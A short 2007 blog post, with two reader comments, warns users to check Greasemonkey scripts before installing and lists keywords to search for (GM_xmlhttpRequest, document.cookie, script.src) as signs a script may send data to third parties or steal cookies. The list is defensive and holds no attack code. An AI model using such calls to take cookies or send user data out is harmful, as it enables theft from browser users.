Thursday, October 11, 2007

Be careful while installing greasemonkey scripts

I would recommend you to view the source code before you install any greasemonkey scripts in your browser.
If you are not familiar with javascript, look if the script has the following words (do an Ctrl+F) :
1) "GM_xmlhttpRequest" (this can potentially send your data to third party servers!)
2) "document.cookie" or "cookie" (do not allow third party scripts to access/steal your cookie)
3) "script.src" (script src hacks can do much harm)

Though these are not exhaustive, they cover the majority of potential vulnerabilities. If in doubt, better not install the script.


Varun S said...

very informative, I was able to figure out malicious scripts with some URLs in the code, but this will help even if URL is obfuscated. Its still PITA if the whole script is obfuscated..

Balaji said...

if the whole script is obfuscated, DO NOT INSTALL it.
greasemonkey scripts are supposed to be free and open, obscure scripts have no place here.